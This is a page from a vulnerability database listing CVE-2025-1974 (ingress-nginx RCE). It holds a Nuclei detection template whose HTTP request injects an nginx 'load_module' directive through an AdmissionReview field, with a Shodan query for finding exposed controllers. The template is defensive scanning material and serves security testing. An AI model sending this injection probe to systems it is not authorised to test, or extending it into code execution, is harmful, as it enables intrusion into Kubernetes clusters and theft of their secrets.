| Reporter | Title | Published | Views | Family All 121 |
|---|---|---|---|---|
| Security Bulletin: IBM InfoSphere Information Server is affected by multiple vulnerabilities in ingress-nginx | 14 Apr 202515:17 | – | ibm | |
| Security Bulletin: Multiple Vulnerabilities in IBM API Connect | 29 Apr 202502:40 | – | ibm | |
| Exploit for CVE-2025-1974 | 19 May 202514:51 | – | githubexploit | |
| Exploit for CVE-2025-1974 | 27 Apr 202505:07 | – | githubexploit | |
| Exploit for CVE-2025-1974 | 26 Mar 202506:43 | – | githubexploit | |
| Exploit for CVE-2025-1974 | 25 Mar 202513:23 | – | githubexploit | |
| Exploit for CVE-2025-1974 | 26 Mar 202516:54 | – | githubexploit | |
| Exploit for CVE-2025-1974 | 26 Mar 202514:49 | – | githubexploit | |
| Exploit for CVE-2025-1974 | 26 Apr 202502:30 | – | githubexploit | |
| Exploit for Incorrect Default Permissions in Amazon Amplify_Cli | 18 Mar 202623:51 | – | githubexploit |
id: CVE-2025-1974
info:
name: Ingress-Nginx Controller - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch,UNC1739
severity: critical
description: |
A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
impact: |
Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover.
remediation: |
Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later
reference:
- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
- https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx
- https://nvd.nist.gov/vuln/detail/CVE-2025-1974
- https://https://github.com/kubernetes/kubernetes/issues/131009
- https://github.com/eeeeeeeeee-code/POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-1974
cwe-id: CWE-653
epss-score: 0.99098
epss-percentile: 0.99927
metadata:
verified: true
max-request: 1
shodan-query: ssl:"ingress-nginx" port:8443
tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,vuln
variables:
string: "{{to_lower('{{randstr}}')}}"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "{{string}}",
"kind": {
"group": "networking.k8s.io",
"version": "v1",
"kind": "Ingress"
},
"resource": {
"group": "networking.k8s.io",
"version": "v1",
"resource": "ingresses"
},
"requestKind": {
"group": "networking.k8s.io",
"version": "v1",
"kind": "Ingress"
},
"requestResource": {
"group": "networking.k8s.io",
"version": "v1",
"resource": "ingresses"
},
"name": "test-{{randstr}}",
"namespace": "default",
"operation": "CREATE",
"userInfo": {
"uid": "{{string}}"
},
"object": {
"kind": "Ingress",
"apiVersion": "networking.k8s.io/v1",
"metadata": {
"name": "test-{{randstr}}",
"namespace": "default",
"creationTimestamp": null,
"uid": "InjectTest#;\n\n}\n}\n}\nload_module test;",
"annotations": {
"nginx.ingress.kubernetes.io/mirror-target": "fake-mirror-target"
}
},
"spec": {
"ingressClassName": "nginx",
"rules": [
{
"host": "test.example.com",
"http": {
"paths": [
{
"path": "/",
"pathType": "Prefix",
"backend": {
"service": {
"name": "kubernetes",
"port": {
"number": 443
}
}
}
}
]
}
}
]
},
"status": {
"loadBalancer": {}
}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
matchers:
- type: word
part: body
words:
- 'AdmissionReview'
- 'load_module'
- 'directive is specified too late'
condition: and
# digest: 4a0a00473045022100f9bdc3cca6932fe5d42e0279d60c394ecb7ac2892b9f4de517a5c223df8eb75d02206b73edd1f24f627209e1c3ed124404d12cb4b0fc0925f3f7745585c968b8ae02:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation